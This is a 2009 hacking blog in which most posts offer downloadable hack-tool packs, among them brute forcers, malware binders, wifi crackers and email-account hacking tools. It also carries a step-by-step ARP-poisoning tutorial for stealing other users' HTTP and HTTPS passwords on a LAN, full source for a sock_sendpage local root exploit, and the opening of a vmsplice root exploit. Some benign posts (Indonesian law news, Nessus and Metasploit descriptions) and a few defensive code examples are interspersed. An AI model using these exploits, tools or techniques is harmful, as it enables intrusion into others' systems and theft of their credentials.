Thursday 31 December 2009

140 Amazing Hacks For your PC


140 Amazing Hacks For your PC!(6MB)

Some of the hacks which this article contains are:
How to call your friends with their own number Extreme Hack
How to Hack a MySpace Account
how Web 2.0 Logos Are Drawn in Photoshop
Photoshop Tips and Tricks
Rapidshare Hack,No waiting for 15 mins
Shutdown Command Via Command Prompt
Talk 2Desktop
VODAFONE HACK FOR FREE GPRS!
Where The Saved Passwords Stores In Windows Xp & Vista - Must for hackers and Beginers
Windows Genuine Hack – 100 percent Works
Wireless Hacking
Call Anywhere in the World From PC to Mobile For Free 100% Working Hack Using Skype and Yahoo Messanger Full Tutorial
Chat with Friends through ms dos Command Prompt
Create Your Own Instant Messenger Bot'
Format A HDD With Notepad
Free Calling to Any US Phone From Your iPhone
Google Hacking
And several more...

Free Download:
1. Rapidshare
2. Password: www.dl4all.com

Ultra Hacker 155 in 1


155 Hack Tools All in One:
Anon FTP
BMP Ripper
CIA 10
FTP BR
Hack the game
Brutus
Genxe
AsPack 21
Hack flash template
Hydra
Hack My space
Blaster W32
and more...

Note: these are hack tools and may be detected as viruses/spyware by antivirus/spyware programs. Use at your own risk.


Free Download:

1. Rapidshare

Full Hack Pack 2009 [Exclusive]


New Hacking Tools 2009 for Georgia Hacking Community

Download
1. Hotfile

Wednesday 30 December 2009

Wifi Hacks 2009 AIO


Wifi Hacks 2009 AIO | 128 MB

This package contains many different tools to hack and crack wifi so you can use your neighbours' internet and do whatever. Tools for Windows and Linux, and also some nice extra tools!
* Aircrack
* Wireshark
* Ettercap
* Netstumbler
* Airsnare
* WIFIfofum
* Wdriver
* and much more...

Linux Hacks:
* Airpwn
* WEPcrack
* Prismstumbler
* WIFIscanner
* Airfart
* Magicmap
* WPA-cracker
* Wellenreiter
* and much more..

Free Download
1. Hotfile

Wireless Hack Toolz 2009


Wireless Hack Toolz 2009 AIO

1. NetStumbler-0.4.0
2. Kismet-2005-08-R
3. Wellenreiter-v1.9
4. WEP 0.1.0
5. Airsnort-0.2.7e
6. Wepwedgie-0.1.0-alpha
7. Hotspotter-0.4

Free Download:
1. Rapidshare

Dangerous Hack Tool 2010


The Most Dangerous Hack Tool 2010

Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner


Brute Forcers

- Munga Bunga's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix

CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
and much more....

EXTRA!
- Telnet Tutorial

Download link:
1. Hotfile
2. Password: crazy-coderz.net

Tuesday 29 December 2009

KingCripts Hacking Pack

AIO | KingCripts Hacking Pack (Legionares™) | 35.97 MB



Download Links: NO MIRROR PLEASE


1. Download Link: Depositfiles (US, DE, ES, UK, FR, RU, IT, CA, PT, NL, BE)
Download from DepositFiles

2. Download Link for other Countries:
Download it from HotFile

ESET Nod32 Keys Finder V7



What's New In V.7 :-
- NodLogin updated to version V10c
- TNod User & Password Finder updated to V1.3 (F!NAL)
- New Sites For Nod Keys added
- Portable Versions - Installation not needed!

Download:
1. Hotfile
2. Rapidshare

A.I.O USB Utilities Tools

A.I.O USB Utilities Tools 2010 V2 (Size: 38,2 MB)

All Software are latest versions
Flash Boot V1.4
USB Disk Security 5
USB Trace
Win SETUP From USB 1.1
Urescue
USB Firewall 1.1.3
USB Stick Locker
USB AntiVirus 2.3
USB Disk Eject

Download
1. Hotfile
2. Rapidshare

Hacking Tools - 85 in 1




Audio-theme: Sean Paul - Temperature

Main page:
- HOTMAIL HACKING
- YAHOO HACKING
- MSN FUN TOOLS
- FAKE SCREENS/PAGES
- OTHER HACKING TOOLS
- FUN TOOLS


Download Free:

1. USA, EU and Russia
Download here
2. Other countries:
Download here

Monday 28 December 2009

Metasploit Framework

The Metasploit Project is ostensibly a group formed to "provide useful information to people who perform penetration testing, IDS signature development, and exploit research."

Their latest release, the Metasploit Framework version 2.0, claims to be "an advanced open-source platform for developing, testing, and using exploit code."

While it is true that the tools and functionality built into the Metasploit Framework might prove valuable for a security auditor or penetration tester to use in verifying the security of a system or network, it is probably as true or more so that script-kiddies and other wannabe hackers or developers of malicious code might put this tool to use as an express lane or fast track to help them create exploits and malware.

I don't really know enough about the Metasploit Project or the developers who have worked on this utility to say whether their motives were pure. It seems that often the line between providing network security and breaking network security is a thin one and it doesn't take much for some otherwise rational people to accuse security researchers or administrators of less than honorable intentions. Some presume that anyone in network security is also a hacker on the side and many question the true intent of tools which double as powerful weapons for script-kiddies.

Even if we assume that their goal truly is to provide useful information and tools to help further the cause of development and security research, it doesn't change the fact that the tool is available for all to download and there is no way to predict or control what the end user will do with it.

The Metasploit Project says that their Metasploit Framework can be compared with expensive commercial products such as Immunity's CANVAS or Core Security Technology's Core Impact. These tools also provide the same or similar functionality. One of the main reasons that they have not come under the scrutiny that the Metasploit Framework has is the price tag. Since few can afford these packages they pose little risk, but if you take that same power and distribute it freely there is a greater concern that the wrong people will use it for the wrong reasons.

The Metasploit Framework seems to be a powerful tool. I downloaded a copy myself to play with, on my own network against my lab computers. I think that for security administrators it may prove valuable in the battle to ensure your computer and network security and make sure you are protected. But, I think we may also start to see new exploits and malware hitting the streets once the script-kiddies start playing with this tool and learning just how powerful it can be as a weapon.

Download Free:
1. Metasploit For Windows
2. Metasploit For Linux

Network Spy 2.0

Network Spy is a general purpose diagnostic tool for administrators, programmers and students of network technologies. It can operate in different modes depending on the application. Some of the more typical applications of this tool include:

1. Packet capture and decode
2. Network Statistics gathering
3. Software debugging
4. Intrusion Detection and activity monitoring

Packet Capture and Decode
In this mode, Network Spy can be used to get a snapshot of data from an ethernet network. It is capable of decoding the most widely used IP protocols such as UDP, TCP and ICMP. It also allows you to save this data for later analysis. The decoded packets are displayed in human readable form.
Network Statistics gathering
In this mode, the amount of data attributed to a certain activity can be captured. For instance, if you want to monitor how much data is transferred between user x and excite.com, you can specify a rule to keep track of the amount of this data. Another example is keeping track of how much FTP data flows on your network.
Software Debugging
People programming network software and web applications will find this tool extremely useful. It can be used to debug application to find errors in code, compute bandwidth utilization and find bottlenecks.
Intrusion Detection and Activity Monitoring
Using the new rules-based filtering mechanism, one can capture packets of interest, avoiding a huge capture of all packets on the network. A rule specifies a pattern to match. For instance, one could specify to capture all ICMP packets where TTL=1. This would be true when someone is performing a traceroute. Similarly, you could specify a rule to capture all TCP packets where the destination port is 23 and the SYN flag is set, to find out how many telnet connections are being established.
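A small rule-based filter in the spirit of the two rules just described (ICMP with TTL=1, TCP SYN to port 23), added here as an illustration; it is not Network Spy's code, and the Packet fields, rule names and sample packets are this example's own constructions.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List

@dataclass
class Packet:
    """One decoded packet; the field names are this example's own, not Network Spy's."""
    src: str
    dst: str
    proto: str                      # "tcp", "udp" or "icmp"
    ttl: int
    dport: int = 0                  # destination port (tcp/udp only)
    flags: frozenset = field(default_factory=frozenset)   # TCP flags, e.g. {"SYN"}
    length: int = 0                 # bytes on the wire

@dataclass
class Rule:
    name: str
    test: Callable[[Packet], bool]

# The two rules the text gives as examples of "a pattern to match".
RULES: List[Rule] = [
    # ICMP with TTL=1: the first-hop probe of a traceroute.
    Rule("traceroute-probe", lambda p: p.proto == "icmp" and p.ttl == 1),
    # TCP to port 23 with SYN set (and not the SYN/ACK reply): a new telnet connection.
    Rule("telnet-connect", lambda p: p.proto == "tcp" and p.dport == 23
                                     and "SYN" in p.flags and "ACK" not in p.flags),
]

def capture_of_interest(packets: List[Packet], rules=RULES) -> Dict[str, List[Packet]]:
    """Keep only the packets matching a rule, grouped by rule name (the IDS mode)."""
    hits: Dict[str, List[Packet]] = {r.name: [] for r in rules}
    for p in packets:
        for r in rules:
            if r.test(p):
                hits[r.name].append(p)
    return hits

def summarize(packets: List[Packet], rules=RULES) -> Dict[str, int]:
    """Match counts per rule, e.g. how many telnet connections were established."""
    return {name: len(pkts) for name, pkts in capture_of_interest(packets, rules).items()}

def bytes_between(packets: List[Packet], host_a: str, host_b: str) -> int:
    """Statistics mode: bytes exchanged between two hosts, in either direction."""
    return sum(p.length for p in packets if {p.src, p.dst} == {host_a, host_b})

# Constructed sample traffic: one traceroute probe, two telnet SYNs, and some noise.
SAMPLE: List[Packet] = [
    Packet("10.0.0.5", "8.8.8.8", "icmp", ttl=1, length=60),
    Packet("10.0.0.5", "8.8.8.8", "icmp", ttl=2, length=60),
    Packet("10.0.0.5", "10.0.0.9", "tcp", ttl=64, dport=23, flags=frozenset({"SYN"}), length=62),
    Packet("10.0.0.9", "10.0.0.5", "tcp", ttl=64, dport=1025, flags=frozenset({"SYN", "ACK"}), length=62),
    Packet("10.0.0.5", "10.0.0.9", "tcp", ttl=64, dport=23, flags=frozenset({"ACK", "PSH"}), length=100),
    Packet("10.0.0.7", "10.0.0.9", "tcp", ttl=64, dport=80, flags=frozenset({"SYN"}), length=62),
    Packet("10.0.0.7", "10.0.0.9", "tcp", ttl=128, dport=23, flags=frozenset({"SYN"}), length=62),
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
    print("10.0.0.5 <-> 10.0.0.9:", bytes_between(SAMPLE, "10.0.0.5", "10.0.0.9"), "bytes")
```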

Network Spy also includes various other tools such as DNS Lookup, Ping, TraceRoute and Whois to aid in everyday tasks.


Other Features

* No bloat software, small and fast executables.
* Easy installation (requires no reboot) and uninstall.
* Dynamically loaded drivers at runtime.
* Simple user-interface.
* View network traffic in realtime.
* Capture packets on a remote network.


System Requirements

* Windows 95/98/NT/2000/XP.
* An Ethernet Adapter (MS Dialup Adapters are not supported).


Download now!

You may download Network Spy and evaluate it. The evaluation version of Network Spy is restricted to 3 minutes of capture at a time.

Download : netspy.exe (545 KB)

Sunday 27 December 2009

"ITE Law Is Problematic in Its Application"

VIVAnews - Constitutional Court (MK) Chief Justice Mahfud MD stressed that the institution he leads has no authority to repeal the Electronic Information and Transactions Law (ITE).

"If you want to repeal the law, that is a political initiative," Mahfud said on Tuesday, 22 December 2009. He stressed that the institution with the authority to repeal a law is the legislature, not the Constitutional Court.

This was in response to a number of legal cases linked to the ITE Law, among them the suit by Omni International Hospital against Prita Mulyasari and the suit by infotainment workers against the artist Luna Maya.

The Constitutional Court, he said, only has authority when the law in question contradicts the 1945 Constitution. "That law does not contradict it," he added.

The same goes for the question of whether or not a law may remain in force. Mahfud said that is also not the Court's domain. "That is the legal policy of the government and the DPR," he said at his office.

Another alternative, he continued, is for the Minister of Law and Human Rights, Patrialis Akbar, to take the initiative. "Draft a bill to replace it," he explained. "That is, if he wants to," Mahfud added.

Mahfud further explained that the law used to charge Prita Mulyasari had previously been submitted for judicial review at the Constitutional Court. The petition was rejected because the arguments behind the enactment of the ITE Law were judged strong and constitutional. "It can be repealed if one wants, but it is not the Court that declares it," he said.

According to Mahfud, the defamation article contained in the ITE Law is correct. "The problem is its application," he said. Today, he considers that citizens' rights must be protected, including from rogue short message service (SMS) messages. "Also to keep people from sending rogue SMS messages," Mahfud said by way of example.

Tifatul: ITE Law Has Several Irregularities


VIVAnews - The government has stated that the Electronic Information and Transactions Law (ITE Law) can be revised. The Minister of Communication and Informatics, Tifatul Sembiring, said the ITE Law does indeed have several irregularities.

Tifatul said he would collect the points in the ITE Law that are considered problematic. "We will collect these first," he said at the office of the Coordinating Minister for the Economy, Jakarta, on Wednesday, 23 December 2009.

Tifatul himself, for instance, points to the article on insult: the existing penalty should be 6 months, but in the article it is set at 6 years.

Earlier, Constitutional Court (MK) Chief Justice Mahfud MD had stressed that the institution he leads has no authority to repeal the Electronic Information and Transactions Law (ITE).

"If you want to repeal the law, that is a political initiative," Mahfud said on Tuesday, 22 December 2009. He stressed that the institution with the authority to repeal a law is the legislature, not the Constitutional Court.

This was in response to a number of legal cases linked to the ITE Law, among them the suit by Omni International Hospital against Prita Mulyasari and the suit by infotainment workers against the artist Luna Maya.

Friday 25 December 2009

LAN Hacking Tutorial (Newbie)

First of all, sorry if this is a repost, because this technique is not a fresh one in the hacking world, but it is not stale either, because it can still be used today: most networks use unencrypted hub & switch networks.
Why unencrypted?
* Most network admins are IT people who specialise in writing programs,
not in network security
* If it were encrypted the bandwidth needed would go up, and of course the internet that is
already slow would get even slower and end in page errors
* Getting an encrypted one is not cheap

This hack uses the techniques:
* Sniffing
* ARP Poison Routing

Neither of the two techniques above can be prevented by any firewall on the victim's computer, guaranteed.
Important Note: ARP Poison Routing can cause a denial of service (DoS) on one or all of the computers on your network

Advantages:
* Will not be detected by any type or series of firewall, because the weakness
lies in the network system, not in the computer
* Can steal every kind of login password that goes through an HTTP server
* Can steal the login passwords of everyone on a hub network for as long as the program is active
* With ARP Poisoning it can be used to steal passwords on HTTPS
* All the programs are free

Disadvantages:
* On a switched network you have to ARP-poison one by one, and a lot of your
bandwidth will be eaten up by that (if your internet is super fast, no problem)
* Whether or not the network admin catches you is outside my responsibility

From here on, assume that the network in this story has 3 computers, namely:
* Victim's computer
* Hacker's computer
* Server

Differences between a switched network and a hub network:

First steps:

1. Check your network type, whether you are on a switched or a hub network. If you are on a
hub network, be grateful, because your hacking process will be much easier.
2. Download the programs needed, namely Wireshark and Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

How to use Wireshark:
* Run the wireshark program
* Press Ctrl+K (click Capture, then Options)
* Make sure the Interface is your Ethernet card that connects to the network;
if not, change it, and also make sure that "Capture packets in promiscuous mode" is on
* Click the Start button
* Click the Stop button once you feel sure that a password has come in while
you were capturing
* You can see every kind of packet going in and out on the network (or only on
your own computer if your network uses a switch)
* To analyse the data, right-click on the data you want to analyse, then click
"Follow TCP Stream", and enjoy analysing the packet (I won't explain how,
because I can't :D)
* What is clear is that somewhere in that data there is the information the victim entered
into the website, and vice versa

The method above only applies if your network is a hub, not a switch
From the method above you can tell whether your network is hub/switch by looking at the IP Source and IP Destination columns. If on every row one of the two is your IP, then your network is certainly a switched network; if not, it is the opposite.

How to use Cain&Abel:
* Using this program is much easier and simpler than using wireshark,
but if you want every packet that has gone out and come in, you are advised
to use wireshark
* Open your Cain program
* Click on the Configure section
* In the "Sniffer" section choose the ethernet card you will use
* In the "HTTP Fields" section you have to add the username fields and password
fields if the ones you want are not in the list.
As an example, I'll tell you that if you want to hack Friendster passwords you have to add the word name to the username fields and password fields; for other sites you can find it by right-clicking, View Source, and looking for the input variables of that website's login and password. What is already there by default seems fairly complete; you can steal passwords on klubmentari without adding anything.
* After that, apply the settings and click OK
* In the main menu there are 8 tabs, and only 1 tab will be discussed, namely the "Sniffer" tab, so choose that tab and do not move away from it, to avoid confusing yourself
* Activate the Sniffer by clicking the sniffer button above those tabs; look for the button labelled "Start/Stop Sniffer"
* If you are on a hub network, you can already see incoming passwords by clicking the "Passwords" tab (this time the tab at the bottom, not the one in the middle; the one in the middle no longer needs clicking)
* You just pick which connection's password you want to see; it will already be listed there
* If it turns out you are on a switched network, this takes more effort: you have to activate APR, whose button is to the right of Sniffer (and this is not guaranteed to work, because switch management is much more complete & secure than a hub)
* Before activating it, in the lower part of the sniffer tab choose APR
* You will see 2 empty lists; click the upper empty list, then click the "+" button (it looks like that) in the row of buttons with Sniffer, APR etc.
* There will be 2 fields containing all the hosts on your network
* Connect the victim's IP address with the server gateway IP address (to find the gateway address, click Start on your computer, choose Run, type cmd, then type ipconfig at the command prompt)
* Only then activate APR, and all the data from the victim's computer to the server can be seen in the same way.

You can run both programs above at the same time (Cain for APR and wireshark for packet sniffing) if you want the best results.

The passwords you can steal are those on an HTTP server (an unencrypted server); if the data is on an encrypted server you have to decrypt the data before getting the password (and that will take steps far longer than this hack).

For terms you don't understand, look them up on wikipedia (the English one, though; the Indonesian one may not have them).

Additional Material:

For those who can already do APR, if you want to steal passwords via HTTPS, here's how (for example klikbca; I haven't actually tried it, just read it in a book):

* Activate APR on the victim's computer
* When the victim goes to klikbca, APR will automatically create a fake certificate so that the data to be transmitted is no longer encrypted (this will cause more certificate warnings on the victim's computer, but if they don't pay much attention it surely won't be noticed)
* That fake certificate will be visible in the https field in your Cain program
* After the victim logs in, look at the log in the https section, right-click and choose view
* From that data you can find out the victim's login password (look around yourself, you'll surely find it).
Give it a try, and if it works don't forget to share here... :D
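A defender-side check for the ARP Poison Routing this tutorial describes, added here as an example and not part of the original post: it watches ARP replies and flags the two things APR produces on the segment, a known IP (especially the gateway) suddenly answering from a different MAC, and one MAC claiming several IPs. The ArpWatch class, field names and sample feed are this example's own constructions; real deployments would feed it from a capture and pin the gateway with a static ARP entry or switch port security.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set

@dataclass(frozen=True)
class ArpReply:
    """One observed ARP reply ("IP x is at MAC y"); constructed here, not captured."""
    ts: float
    sender_ip: str
    sender_mac: str

@dataclass(frozen=True)
class Alert:
    ts: float
    kind: str
    detail: str

class ArpWatch:
    """Tracks IP->MAC claims seen on the segment and flags the changes APR causes."""

    def __init__(self, gateway_ip: str):
        self.gateway_ip = gateway_ip
        self.table: Dict[str, str] = {}                       # ip -> last MAC that claimed it
        self.claims: Dict[str, Set[str]] = defaultdict(set)   # mac -> every ip it has claimed
        self.alerts: List[Alert] = []

    def observe(self, r: ArpReply) -> List[Alert]:
        new: List[Alert] = []
        old_mac = self.table.get(r.sender_ip)
        # A MAC change for a known IP is the signature of a poisoned cache; the
        # gateway changing is the case that puts the attacker on every flow.
        if old_mac is not None and old_mac != r.sender_mac:
            kind = "gateway-mac-changed" if r.sender_ip == self.gateway_ip else "mac-changed"
            new.append(Alert(r.ts, kind, f"{r.sender_ip}: {old_mac} -> {r.sender_mac}"))
        # One MAC answering for several IPs is how APR sits between victim and gateway.
        if r.sender_ip not in self.claims[r.sender_mac] and self.claims[r.sender_mac]:
            claimed = sorted(self.claims[r.sender_mac] | {r.sender_ip})
            new.append(Alert(r.ts, "mac-claims-multiple-ips", f"{r.sender_mac} now claims {claimed}"))
        self.table[r.sender_ip] = r.sender_mac
        self.claims[r.sender_mac].add(r.sender_ip)
        self.alerts.extend(new)
        return new

GATEWAY = "192.168.1.1"

# Constructed sample: normal replies, a harmless re-announcement, then a third
# host answering for both the gateway and the victim address.
SAMPLE_FEED: List[ArpReply] = [
    ArpReply(1.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(2.0, "192.168.1.20", "aa:bb:cc:00:00:20"),
    ArpReply(2.5, "192.168.1.1", "aa:bb:cc:00:00:01"),   # same MAC as before: no alert
    ArpReply(3.0, "192.168.1.1", "aa:bb:cc:00:00:99"),
    ArpReply(4.0, "192.168.1.20", "aa:bb:cc:00:00:99"),
]

def run(feed: List[ArpReply], gateway_ip: str = GATEWAY) -> List[Alert]:
    """Replay a feed through ArpWatch and return every alert it raised, in order."""
    watch = ArpWatch(gateway_ip)
    for reply in feed:
        watch.observe(reply)
    return watch.alerts

if __name__ == "__main__":
    for a in run(SAMPLE_FEED):
        print(f"t={a.ts:.1f} {a.kind}: {a.detail}")
```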

Thursday 24 December 2009

Nessus

In typical operation, Nessus begins by doing a port scan with one of its four internal portscanners (or it can optionally use Amap or Nmap) to determine which ports are open on the target, and then tries various exploits on the open ports. The vulnerability tests, available as subscriptions, are written in NASL (Nessus Attack Scripting Language), a scripting language optimized for custom network interaction.

Tenable Network Security produces several dozen new vulnerability checks (called plugins) each week, usually on a daily basis. These checks are available for free to the general public; commercial customers are no longer allowed to use this Home Feed. The Professional Feed (which is not free) also gives access to support and additional scripts (audit and compliance tests...).

Optionally, the results of the scan can be reported in various formats, such as plain text, XML, HTML and LaTeX. The results can also be saved in a knowledge base for debugging. On UNIX, scanning can be automated through the use of a command-line client. There exist many different commercial, free and open source tools for both UNIX and Windows to manage individual or distributed Nessus scanners.

If the user chooses to do so (by disabling the option 'safe checks'), some of Nessus's vulnerability tests may try to cause vulnerable services or operating systems to crash. This lets a user test the resistance of a device before putting it in production.

Nessus provides additional functionality beyond testing for known network vulnerabilities. For instance, it can use Windows credentials to examine patch levels on computers running the Windows operating system, and can perform password auditing using dictionary and brute force methods. Nessus 3 and later can also audit systems to make sure they have been configured per a specific policy, such as the NSA's guide for hardening Windows servers.

The "Nessus" Project was started by Renaud Deraison in 1998 to provide to the Internet community a free remote security scanner. On October 5, 2005, Tenable Network Security, the company Renaud Deraison co-founded, changed Nessus 3 to a proprietary (closed source) license. The Nessus 3 engine is still free of charge, though Tenable charges $100/month per scanner for the ability to perform configuration audits for PCI, CIS, FDCC and other configuration standards, technical support, SCADA vulnerability audits, the latest network checks and patch audits, the ability to audit anti-virus configurations and the ability for Nessus to perform sensitive data searches to look for credit card, social security number and many other types of corporate data.

In July of 2008, Tenable sent out a revision of the feed license which will allow home users full access to plugin feeds.[5] A professional license is available for commercial use.

The Nessus 2 engine and a minority of the plugins are still GPL, leading to forked open source projects based on Nessus like OpenVAS and Porz-Wahn. Tenable Network Security has still maintained the Nessus 2 engine and has updated it several times since the release of Nessus 3.

Nessus 3 is available for many different UNIX and Windows systems, offers patch auditing of UNIX and Windows hosts without the need for an agent and is 2-5 times faster than Nessus 2.

Download Nessus Free:
1. Nessus For Windows
2. Nessus For Linux

Linux sock_sendpage

/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/

/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/


Wednesday 23 December 2009

Linux kernel 2.4/2.6

/*
**
** 0x82-CVE-2009-2692
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** spender and venglin's code is very excellent.
** Thankful to them.
**
** Greets: Brad Spengler ,
** Przemyslaw Frasunek .
** --
** exploit by .
**
** "Slow and dirty exploit for this one"
**
*/

#include
#include
#include
#include
#include
#include

unsigned int uid, gid;

void kernel_code()
{
unsigned long where=0;
unsigned long *pcb_task_struct;

where=(unsigned long )&where;
where&=~8191;
pcb_task_struct=(unsigned long *)where;

while(pcb_task_struct){
if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
break;
}
pcb_task_struct++;
}
return;
/*
** By calling iret after pushing a register into kernel stack,
** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}
**
** kernel_code() function will return to its previous status which means before sendfile() system call,
** after operating upon a ring0(kernel mode) privilege level.
** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.
*/
}
void *kernel=kernel_code;

int main(int argc,char *argv[])
{
int fd_in=0,fd_out=0,offset=1;
void *zero_page;

uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}

/*
** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)
*/
if(personality(0xffffffff)==PER_SVR4){
if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
perror("[-] mprotect()");
return -1;
}
}
else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
perror("[-] mmap()");
return -1;
}
*(char *)0x00000000=0xff;
*(char *)0x00000001=0x25;
*(unsigned long *)0x00000002=(unsigned long)&kernel;
*(char *)0x00000006=0xc3;

if((fd_in=open(argv[0],O_RDONLY))==-1){
perror("[-] open()");
return -1;
}
if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
}
gogossing:
/*
** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,
** an attacker can make all the processes runing under current user uid 0.
*/
if(sendfile(fd_out,fd_in,&offset,2)==-1){
if(offset==0){
perror("[-] sendfile()");
return -1;
}
close(fd_out);
fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
}
if(getuid()==uid){
if(offset){
offset=0;
}
goto gogossing; /* all process */
}
close(fd_in);
close(fd_out);

execl("/bin/sh","sh","-i",NULL);
return 0;
}

/* eoc */

Tuesday 22 December 2009

Kernel 2.6.17

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

